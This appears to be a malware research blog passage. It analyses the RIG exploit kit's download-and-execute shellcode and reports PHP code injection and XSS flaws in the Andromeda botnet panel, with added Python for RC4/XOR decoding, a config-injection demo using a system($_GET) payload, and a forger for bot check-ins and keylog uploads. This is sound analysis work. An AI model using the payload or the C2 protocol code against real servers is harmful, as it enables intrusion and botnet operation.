<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMIt-2_FpDStcrBuYpNWs0McMGHDqNIfgLIn0a8U1frOEL10-Z3FGg8cOXlK2H1WOcDLWLOfDShdQ6B7Mq9s_QBuw6q7DXsNX1aBs38itzlpenb9AY6COEYWMUS9UW-cmFRCvbCBtZRk/s1600/rig_shellcode_rc4_key.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgMIt-2_FpDStcrBuYpNWs0McMGHDqNIfgLIn0a8U1frOEL10-Z3FGg8cOXlK2H1WOcDLWLOfDShdQ6B7Mq9s_QBuw6q7DXsNX1aBs38itzlpenb9AY6COEYWMUS9UW-cmFRCvbCBtZRk/s1600/rig_shellcode_rc4_key.png" height="80" width="320" /></a></div>
EDI points to the first byte of the key and EBP holds the key length, which is 5, giving the key <b>m3S4V</b>.<br />
<br />
At this point there are two options: let the shellcode run until <i>CloseHandle</i> is called, at which point the decrypted payload has been written back to disk, or write a script that decrypts the payload extracted from the PCAP. A small Python implementation of the RC4 cipher can be found <a href="http://www.joonis.de/en/code/rc4-algorithm">here</a>.<br />
<br />
<i><b><span style="font-size: large;">Multiple payloads</span></b></i><br />
The most interesting thing about the shellcode is that it carries more functionality than is used. In this case it downloads a single payload, but it supports multiple payloads.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTI3lqxgYAgkOBlpgc0PFaJhNgxPiq4Qz2rXUu_ZB5c5WvcFjIPhafSdu20Ig8VaqTVxz3DlrTsc77WG7K4Mav9LaLrSTCl4dpFJ-27CpbzHiYh_Nfb2tCXOHd3ptFLmCr8Sqh89X92po/s1600/rig_shellcode_multiple.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTI3lqxgYAgkOBlpgc0PFaJhNgxPiq4Qz2rXUu_ZB5c5WvcFjIPhafSdu20Ig8VaqTVxz3DlrTsc77WG7K4Mav9LaLrSTCl4dpFJ-27CpbzHiYh_Nfb2tCXOHd3ptFLmCr8Sqh89X92po/s1600/rig_shellcode_multiple.png" height="95" width="400" /></a></div>
<br />
After calling CreateProcessA, the shellcode steps through the URL it just used looking for the end of the string (0x00) and compares the byte after it with "!" (0x21). If they match, the shellcode ends; otherwise it starts over with the next URL as a new payload.<br />
An example URL-list would look like this:<br />
<pre class="brush: js"><i><url1>0x00<url2>0x00...<urlN>0x00 0x21</i></pre>
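Since the decoding is just XOR plus RC4, the whole thing is easy to reproduce offline against a PCAP. The following is an added example (not code from the original post): a Python re-implementation of the two decoding stages, the XOR loop over the URL-list that stops at the decoded "!" and the RC4 decryption of the downloaded payload with the recovered key m3S4V. The XOR key value, the URLs and the fake payload are constructed for the demo (the real XOR key is read from ESI as described above), and the MZ sanity check after decryption is an addition, not something the shellcode does.

```python
# Added example (not the post's own code): re-implements the two decoding
# steps the RIG shellcode performs, so a payload can be recovered straight
# from the PCAP without running the shellcode.
from itertools import cycle
from typing import List

RC4_KEY = b"m3S4V"          # key recovered from the shellcode (EDI/EBP, see above)
URL_LIST_TERMINATOR = 0x21  # decoded "!" ends the URL-list


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decode_url_list(blob: bytes, xor_key: bytes) -> List[str]:
    r"""Mimic the shellcode's XOR loop: decode byte by byte with a repeating
    key and stop as soon as the *decoded* byte is "!" (0x21).
    Entries are NUL-separated: <url1>\x00<url2>\x00...<urlN>\x00!"""
    decoded = bytearray()
    for enc, k in zip(blob, cycle(xor_key)):
        b = enc ^ k
        if b == URL_LIST_TERMINATOR:
            break
        decoded.append(b)
    else:
        raise ValueError("URL list is not terminated with '!'")
    return [u.decode("ascii") for u in bytes(decoded).split(b"\x00") if u]


def decrypt_payload(ciphertext: bytes, key: bytes = RC4_KEY) -> bytes:
    """RC4-decrypt a downloaded payload. The MZ check is an added sanity
    check: the shellcode hands the result to CreateProcessA, so a wrong key
    shows up as a missing PE header."""
    plain = rc4(key, ciphertext)
    if plain[:2] != b"MZ":
        raise ValueError("decrypted data has no MZ header; wrong key?")
    return plain


# --- Constructed sample data (not taken from the real traffic) -------------
XOR_KEY = b"\x13\x37\x42\x99\x0a"   # assumed 5-byte key; the real one sits in ESI
PLAIN_LIST = b"http://a.example/1.exe\x00http://b.example/2.exe\x00!"
ENCODED_LIST = bytes(p ^ k for p, k in zip(PLAIN_LIST, cycle(XOR_KEY)))

if __name__ == "__main__":
    # Cheap self-check of the cipher against the standard RC4 test vector.
    assert rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
    print(decode_url_list(ENCODED_LIST, XOR_KEY))
    # RC4 is symmetric, so a fake payload can be round-tripped for the demo.
    fake_pe = b"MZ" + b"\x90" * 62
    print(decrypt_payload(rc4(RC4_KEY, fake_pe)) == fake_pe)
```

One consequence of the terminator scheme worth knowing: because the loop stops on the first decoded 0x21, a payload URL can never contain "!". When running this on real data, the test-vector check at the top of the main block is the cheap way to rule out an implementation slip before concluding that the key is wrong.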
<br />
<br />
<i><b><span style="font-size: large;">Conclusion of sorts</span></b></i><br />
RIG's shellcode has the capability to download and execute multiple payloads, each encrypted with RC4 (5-byte key). The URL-list is encoded with XOR (5-byte key).<br />
<br />
API-calls used in the shellcode (in order of first call):<br />
<i>- LoadLibraryA </i><br />
<i>- URLDownloadToCacheFileA</i><br />
<i>- CreateFileA</i><br />
<i>- VirtualAlloc </i><br />
<i>- ReadFile</i><br />
<i>- SetFilePointer</i><br />
<i>- WriteFile</i><br />
<i>- VirtualFree </i><br />
<i>- CloseHandle </i><br />
<i>- CreateProcessA</i><br />
<br />
You can find the hex-encoded shellcode on [<a href="http://pastebin.com/sum6RXiZ">pastebin</a>].<br />
<h3>
Andromeda - Vulnerabilities and Enumeration</h3>
<i>Posted 2014-10-09</i><br />
Andromeda has been around for quite some time and is a well-known loader capable of both formgrabbing and keylogging. The bot has been well documented on several blogs around the web; however, I've not seen anyone take a closer look at the panel source code, so when I stumbled upon the latest version of the panel I decided to take a look and see if there is anything useful in terms of vulnerabilities.<br />
<br />
During one of my investigations I was able to acquire logs which illustrate how Andromeda is sold to buyers and how the panel is acquired. It's sold through an automated system; the commands available to a buyer are shown below:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mJchFtCmklgFW7jFeIOjt9kiriX0cLVr9DoKLU6dRtiqNTuwi7LuXF7G6wFRU70JM7Ug0QPeInQgum50vX5YlYSEljj9NtqymlUOZ2eHeo-TjgolThicp8EmYck96QehyphenhyphenLuDLcKPikI/s1600/andromeda_seller.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mJchFtCmklgFW7jFeIOjt9kiriX0cLVr9DoKLU6dRtiqNTuwi7LuXF7G6wFRU70JM7Ug0QPeInQgum50vX5YlYSEljj9NtqymlUOZ2eHeo-TjgolThicp8EmYck96QehyphenhyphenLuDLcKPikI/s1600/andromeda_seller.png" height="250" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Available commands for buyers</td></tr>
</tbody></table>
<br />
<h4>
Admin panel</h4>
The panel comes in a password protected RAR-archive which holds:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczx0XdDwK0KhlOriv8qYtsMHV8vse0aGiarWgpufRKKheYlvxA4LB9VWRMSbzz5RqOM7TVFMScG2F2hyphenhyphenP4dkof9uuZ3QJ3HlCQ70R1KI7vNsE5Tpi8kF9GwFb13O7LcmKKCtPLQrMGA4/s1600/andromeda_panel_files.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjczx0XdDwK0KhlOriv8qYtsMHV8vse0aGiarWgpufRKKheYlvxA4LB9VWRMSbzz5RqOM7TVFMScG2F2hyphenhyphenP4dkof9uuZ3QJ3HlCQ70R1KI7vNsE5Tpi8kF9GwFb13O7LcmKKCtPLQrMGA4/s1600/andromeda_panel_files.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Andromeda Panel</td></tr>
</tbody></table>
Check out <a href="http://malware.dontneedcoffee.com/2012/07/inside-andromeda-bot-v206-webpanel-aka.html">this post</a> by <a href="https://twitter.com/kafeine">@kafeine</a> on how the panel looks in general; this post focuses mostly on the source code and functionality.<br />
<br />
Starting from the top, <b>adm.php</b> is packed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFHMRT9LgLCMj4QjsQ_MzolayQMLOSskNN1bf1LSjISjHqQpUV5rcsi907yfHDJzT-m0O8gK6HbMnk6Y94UHv5Ph9GgrKKuUbzak6RR1idgzkP6TNqNDzED3C0m-i_KvtdUupo_nkYlp8/s1600/andromeda_adm_obfuscated.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFHMRT9LgLCMj4QjsQ_MzolayQMLOSskNN1bf1LSjISjHqQpUV5rcsi907yfHDJzT-m0O8gK6HbMnk6Y94UHv5Ph9GgrKKuUbzak6RR1idgzkP6TNqNDzED3C0m-i_KvtdUupo_nkYlp8/s1600/andromeda_adm_obfuscated.png" height="42" width="400" /></a></div>
<br />
After unpacking and formatting, what's left is a layer of string obfuscation, as shown in this extract:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwd9UViAmULZYD3Ud7sUq_x-aFY_fIVXY7FqEdGv71DDsbAGjMprsG-YE9MrEcq0081-qTS3LR6iXRppVDLLaALJmufPxiuS4J50Am0Ym-EUbbV8Tnk8z-guI3MRyjlWkNGWFtNIj3AlA/s1600/andromeda_adm_extract.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwd9UViAmULZYD3Ud7sUq_x-aFY_fIVXY7FqEdGv71DDsbAGjMprsG-YE9MrEcq0081-qTS3LR6iXRppVDLLaALJmufPxiuS4J50Am0Ym-EUbbV8Tnk8z-guI3MRyjlWkNGWFtNIj3AlA/s1600/andromeda_adm_extract.png" height="167" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Unpacked code with obfuscated strings</td></tr>
</tbody></table>
The strings are decoded using the function below, where the first parameter is the encoded string and the second is the key:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgi0-NAEIGpkJM7SAqCwuL3-U1AF5KQibbMckAyo01VbRF2avsQj36kz5XIK0FXWtaBjVU8f2F0BCpFXRP1dm5CjZWyCN8SH70Y5OYV6W7wDcrvsno4xLC_PNRNQX_jLi9Bi4Atu4zI4/s1600/andromeda_adm_crypt.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqgi0-NAEIGpkJM7SAqCwuL3-U1AF5KQibbMckAyo01VbRF2avsQj36kz5XIK0FXWtaBjVU8f2F0BCpFXRP1dm5CjZWyCN8SH70Y5OYV6W7wDcrvsno4xLC_PNRNQX_jLi9Bi4Atu4zI4/s1600/andromeda_adm_crypt.png" height="75" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Function for decoding strings</td></tr>
</tbody></table>
<br />
<br />
<br />
Using that same function together with some PHP "preg_match-magic" to swap each call for its decoded literal, the code ends up much more readable.<br />
<br />
<h3>
PHP Code Injection (requires credentials)</h3>
One function that stood out in the code was <b>SaveSettings</b>:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbU9gdCnwzbjxh4ekZpn2jBTF0_4Rv1McYGLgfDznz32T-S-4z8i6zUYGXSDOlnYu9yFTylGyBzjLDBKsTsUgB-TSIrQQ8qtjp9v_fhJ1su7wMAcBOMU-irMP4CRyaABgdtuJaPMIT7iI/s1600/andromeda_adm_savesettings.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbU9gdCnwzbjxh4ekZpn2jBTF0_4Rv1McYGLgfDznz32T-S-4z8i6zUYGXSDOlnYu9yFTylGyBzjLDBKsTsUgB-TSIrQQ8qtjp9v_fhJ1su7wMAcBOMU-irMP4CRyaABgdtuJaPMIT7iI/s1600/andromeda_adm_savesettings.png" height="126" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">SaveSettings to config (note: syntax is somewhat off)</td></tr>
</tbody></table>
The settings are written straight to file without any check for malformed content in the values, and the code that calls the function does no validation either. Since the file is PHP that the panel executes, this opens up for PHP code injection, which for anyone holding panel credentials means command execution on the server.<br />
<br />
Example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHEeQsr8jKLzNyyJCojUXLdCz_-LkZ3rQmNVEJkWwKe4hPO4fkpm9cHtA3wm06LJ1VDbYVUI-Wwds7c0DjyJG1Y5Mw-6bjgXHn5F1dJTlNbbzW_RNzyHeTjKEFS956u2T3K2KMebeH35w/s1600/andromeda_adm_rce.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHEeQsr8jKLzNyyJCojUXLdCz_-LkZ3rQmNVEJkWwKe4hPO4fkpm9cHtA3wm06LJ1VDbYVUI-Wwds7c0DjyJG1Y5Mw-6bjgXHn5F1dJTlNbbzW_RNzyHeTjKEFS956u2T3K2KMebeH35w/s1600/andromeda_adm_rce.png" height="271" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Writing PHP code to config</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCH2KNLR4RZmNrqDU8UwNp1zGxIr43ZbYVqALgy-XeZJHGUta1ZmnntciIhF9N2XrOydOkduHxCMmK2DlrbsXWuDwPJimNMrizzNIlrkj-J1eUvSfyA5qH1b9NE9PGCrPMRUnhpImF-6k/s1600/andromeda_adm_cmd.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCH2KNLR4RZmNrqDU8UwNp1zGxIr43ZbYVqALgy-XeZJHGUta1ZmnntciIhF9N2XrOydOkduHxCMmK2DlrbsXWuDwPJimNMrizzNIlrkj-J1eUvSfyA5qH1b9NE9PGCrPMRUnhpImF-6k/s1600/andromeda_adm_cmd.png" height="70" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Executing commands through config.php</td></tr>
</tbody></table>
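As an added example (not the panel's code; the real SaveSettings body is only visible in the screenshot above), here is a Python model of the pattern: a config writer that drops attacker-controlled values straight into a PHP file, next to one that quotes them correctly. The setting name, the single-quoted literal layout and the payload value are assumptions made for the demo.

```python
# Added example (not the Andromeda panel's code): models the SaveSettings
# pattern, untrusted values serialised into an executable PHP config file,
# next to a writer that quotes them. Layout and key names are assumptions.
from typing import Dict


def write_config_unsafe(settings: Dict[str, str]) -> str:
    """Vulnerable: the value is dropped into a single-quoted PHP literal as-is.
    A value containing a quote terminates the literal; the rest is PHP code."""
    lines = ["<?php"]
    for key, value in settings.items():
        lines.append("$config['%s'] = '%s';" % (key, value))
    return "\n".join(lines) + "\n"


def php_single_quoted(value: str) -> str:
    """Encode a string as a PHP single-quoted literal. Inside '...' PHP only
    recognises the escapes \\\\ and \\', so those two characters are all
    that must be escaped; everything else is taken literally."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def write_config_safe(settings: Dict[str, str]) -> str:
    """Same file layout, but every value goes through php_single_quoted()
    and keys are restricted to plain identifiers."""
    lines = ["<?php"]
    for key, value in settings.items():
        if not key.isidentifier():
            raise ValueError("refusing to write setting with key %r" % key)
        lines.append("$config[%s] = %s;" % (php_single_quoted(key),
                                            php_single_quoted(value)))
    return "\n".join(lines) + "\n"


def literal_is_intact(line: str) -> bool:
    """Demo check: does the assignment still consist of exactly one PHP
    string literal followed by ';'? Walks the literal honouring the two
    escape sequences and reports whether anything else trails it."""
    if "= '" not in line:
        return False
    i = line.index("= '") + 3          # first character inside the literal
    while i < len(line):
        if line[i] == "\\":
            i += 2                     # skip an escaped character
            continue
        if line[i] == "'":
            return line[i + 1:] == ";"  # closing quote must be the end
        i += 1
    return False


# Constructed attacker-controlled setting value (not taken from the panel).
PAYLOAD = "'; system($_GET['c']); //"

if __name__ == "__main__":
    print(write_config_unsafe({"title": PAYLOAD}))
    print(write_config_safe({"title": PAYLOAD}))
```

Escaping closes this particular door, but the durable fix is to keep settings out of executable source altogether: store them in the database or in a data file that is parsed rather than included.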
<br />
<h3>
Cross Site Scripting (requires credentials)</h3>
Tasks can be added and are then listed in the panel; the code for adding them shows that no validation is done, so for example JavaScript and HTML can be injected:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZRB-gOjFJbdCfKHwLntaPu3nrB2y4RiEwpSGrpub0Dr5QHP-0mXdnNOQDQ8bZv_Zz4RLdyd5MN0VKiAvnDVg74OM_hhCFglsTKwqEQVpAJtGxnyJioglOVhfgTloMzzOl3QS_K3A8Log/s1600/andromeda_adm_tasks.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZRB-gOjFJbdCfKHwLntaPu3nrB2y4RiEwpSGrpub0Dr5QHP-0mXdnNOQDQ8bZv_Zz4RLdyd5MN0VKiAvnDVg74OM_hhCFglsTKwqEQVpAJtGxnyJioglOVhfgTloMzzOl3QS_K3A8Log/s1600/andromeda_adm_tasks.png" height="212" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for adding tasks to database</td></tr>
</tbody></table>
Using the URL field, whatever code is injected is executed when the tasklist is viewed.<br />
<br />
Example:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4ZKhLAFj1ecCF5PEI0o35qIX3p-8JvIYm8V7BY92v2XqhSYiV-DLsmrpqaSYhTMc0ieekxqte6At3q8cU1OrLlbhcMQAtuxFhWV9-nEgyWx_PalDbMGsR88msRmTWT6hLk-_47WVYjo/s1600/andromeda_adm_xss_code.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE4ZKhLAFj1ecCF5PEI0o35qIX3p-8JvIYm8V7BY92v2XqhSYiV-DLsmrpqaSYhTMc0ieekxqte6At3q8cU1OrLlbhcMQAtuxFhWV9-nEgyWx_PalDbMGsR88msRmTWT6hLk-_47WVYjo/s1600/andromeda_adm_xss_code.png" height="226" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Javascript saved in the URL field</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZw7bbIthExB_FhIBYs7InzhVB_KsSNukyxlXe0QSFuMcYe3bmWhorl3ozv4bMJCE_91xLOc5Fx_HBo4ULSJm7IBZFPe90EwKV99Zc9wbc5OnjLwswID1bJfQ_28Ts0pFfpu7QhReNzq4/s1600/andromeda_adm_xss.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZw7bbIthExB_FhIBYs7InzhVB_KsSNukyxlXe0QSFuMcYe3bmWhorl3ozv4bMJCE_91xLOc5Fx_HBo4ULSJm7IBZFPe90EwKV99Zc9wbc5OnjLwswID1bJfQ_28Ts0pFfpu7QhReNzq4/s1600/andromeda_adm_xss.png" height="141" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Result of the Javascript while viewing tasklist</td></tr>
</tbody></table>
<br />
<br />
<h3>
Command Enumeration (requires RC4 key)</h3>
Having established two vulnerabilities in the admin panel, the same type of code (obfuscation and naming convention) is also found in the gate (<b>gate.php</b>). Since Andromeda's gate has no file-upload functionality, it isn't possible to upload files remotely, as with the ZeuS remote update vulnerability.<br />
<br />
It is, however, possible to communicate with the panel to retrieve commands and submit data in the form of keylogs and grabbed forms, provided the RC4 key is known. The key can be acquired by debugging the bot (out of scope for this post).<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCb06XyLOwXFUZR5Pobxs3k8Ntnl9uALEqsrfo8UxGKMmQtb1vG8msahVID_p8fxFQUYj6KWJmiH744kLrAsxhzFUvZ2c35XlkP4o1N-WbGeR-uJYh7aE3DYbT6dl1m_C3clYrtP1HbQ/s1600/andromeda_adm_checkin.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdCb06XyLOwXFUZR5Pobxs3k8Ntnl9uALEqsrfo8UxGKMmQtb1vG8msahVID_p8fxFQUYj6KWJmiH744kLrAsxhzFUvZ2c35XlkP4o1N-WbGeR-uJYh7aE3DYbT6dl1m_C3clYrtP1HbQ/s1600/andromeda_adm_checkin.png" height="225" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for parsing data from POST-request</td></tr>
</tbody></table>
The format used for a regular check-in is <b>id:%lu|bid:%lu|os:%lu|a:%lu|rg:%lu</b>; more can be found by analyzing the binary (out of scope for this post). If the data is encrypted with the correct key and posted to the panel, the panel responds with HTTP 200 OK and, if tasks have been configured, encrypted data.<br />
<br />
The response is encrypted using the bot id as the key.<br />
<br />
If the wrong key is used to encrypt the data, or the data is malformed, the panel returns an HTTP 404 response, which makes the status code a handy oracle for whether the key is right.<br />
<br />
Python makes it easy to automate all of this and enumerate commands from a live server [<a href="http://pastebin.com/nPfQzhcN">script</a>]:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMd-LLrFEoaC2ryw_QLP3gidzM68rOagvQhlmO503yRhBNo0z3SlOIfiPb6fXAsob_KVfNtVnWMBNFc6xsNsQxJZfJl1mvPgaBfjmVBLbFZ7-VgjhHCOMam6_4N3tJVlJfzRTArppoScQ/s1600/andromeda_gate_script.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMd-LLrFEoaC2ryw_QLP3gidzM68rOagvQhlmO503yRhBNo0z3SlOIfiPb6fXAsob_KVfNtVnWMBNFc6xsNsQxJZfJl1mvPgaBfjmVBLbFZ7-VgjhHCOMam6_4N3tJVlJfzRTArppoScQ/s1600/andromeda_gate_script.png" height="92" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Script for enumerating commands from panel</td></tr>
</tbody></table>
<br />
Keylogs and formgrabs are uploaded by appending <b>fg:</b> or <b>kl:</b> followed by the base64-encoded logs to the format above. Each grabbed form and each keylog is delimited by 0x01, and the values within a log are delimited by 0x02 (for example user-agent, cookie and URL for grabbed forms).<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKbW9VKAdtr4mnADl2Z4QxlKiaN_poAv94E2zjNa0dLYlMbj_DaOe_jZDJ8swjgit3rnZV_oJUf4Pr6K6Cu3PaWfW-sA_pR401h8U8D7hdO3dxbQ2KPRtGv3tx31VN-q3VPYqJUi3JHE/s1600/andromeda_adm_logs.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKbW9VKAdtr4mnADl2Z4QxlKiaN_poAv94E2zjNa0dLYlMbj_DaOe_jZDJ8swjgit3rnZV_oJUf4Pr6K6Cu3PaWfW-sA_pR401h8U8D7hdO3dxbQ2KPRtGv3tx31VN-q3VPYqJUi3JHE/s1600/andromeda_adm_logs.png" height="98" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Code for parsing uploaded logs</td></tr>
</tbody></table>
An example of the formatting for keylogs before base64 encoding:<br />
<b>\x01<keylog>\x02<process caption>\x02<process name>\x01</b><br />
Formgrabs:<br />
<b>\x01<cookie>\x02<form data>\x02<user-agent>\x02<URL>\x01</b><br />
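To make the format concrete, here is an added example (neither the pastebin script nor the panel's code): it builds the plaintext check-in body a bot would POST, including the kl:/fg: log blobs, and parses it the way the gate does. Assumptions: the extra fields are appended with the same "|" separator, consecutive records share a single 0x01 delimiter, and all sample values are constructed. The RC4 layer (request encrypted with the bot's RC4 key, response with the bot id) is deliberately left out; this shows only the plaintext the gate parses.

```python
# Added example (not the author's script or the panel's code): builds and
# parses the Andromeda check-in format described above. The RC4 wrapping on
# the wire is left out on purpose; only the plaintext format is shown.
import base64
from typing import Dict, Sequence

REC = b"\x01"   # separates records (one keylog, one grabbed form)
FLD = b"\x02"   # separates the values inside one record


def encode_records(records: Sequence[Sequence[bytes]]) -> bytes:
    r"""Serialise records as \x01v1\x02v2...\x01 and base64 the result.
    Assumption: consecutive records share a single 0x01 separator."""
    if not records:
        return b""
    for fields in records:
        if any(REC in v or FLD in v for v in fields):
            raise ValueError("a value contains a delimiter byte")
    body = REC + REC.join(FLD.join(fields) for fields in records) + REC
    return base64.b64encode(body)


def build_checkin(bot_id: int, build_id: int, os_ver: int, is_admin: int,
                  rights: int, keylogs: Sequence[Sequence[bytes]] = (),
                  formgrabs: Sequence[Sequence[bytes]] = ()) -> bytes:
    """Plaintext check-in: id:%lu|bid:%lu|os:%lu|a:%lu|rg:%lu plus optional
    kl:/fg: fields. Assumption: extra fields use the same '|' separator."""
    parts = [b"id:%d" % bot_id, b"bid:%d" % build_id, b"os:%d" % os_ver,
             b"a:%d" % is_admin, b"rg:%d" % rights]
    if keylogs:
        parts.append(b"kl:" + encode_records(keylogs))
    if formgrabs:
        parts.append(b"fg:" + encode_records(formgrabs))
    return b"|".join(parts)


def parse_checkin(body: bytes) -> Dict[str, object]:
    """Gate-side view of the same body. Base64 never contains '|' or ':',
    so splitting on them is safe; numeric fields become ints, log blobs
    become lists of records, each record a list of values."""
    out: Dict[str, object] = {}
    for part in body.split(b"|"):
        key, _, value = part.partition(b":")
        name = key.decode("ascii")
        if name in ("fg", "kl"):
            raw = base64.b64decode(value)
            out[name] = [rec.split(FLD) for rec in raw.split(REC) if rec]
        else:
            out[name] = int(value)
    return out


# Constructed sample logs (not real victim data): keylog = text, window
# caption, process name; formgrab = cookie, form data, user-agent, URL.
SAMPLE_KEYLOGS = [(b"hunter2\r\n", b"Login - Mozilla Firefox", b"firefox.exe")]
SAMPLE_FORMS = [(b"session=abc", b"user=alice&pass=hunter2",
                 b"Mozilla/5.0", b"https://bank.example/login")]

if __name__ == "__main__":
    req = build_checkin(1234, 1, 0x0601, 1, 0,
                        keylogs=SAMPLE_KEYLOGS, formgrabs=SAMPLE_FORMS)
    print(req)
    print(parse_checkin(req))
```

The delimiter guard in encode_records matters in practice: a value containing 0x01 or 0x02 would silently split into extra records on the gate side, which is the kind of thing to keep in mind when writing a "message" into the logs.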
<br />
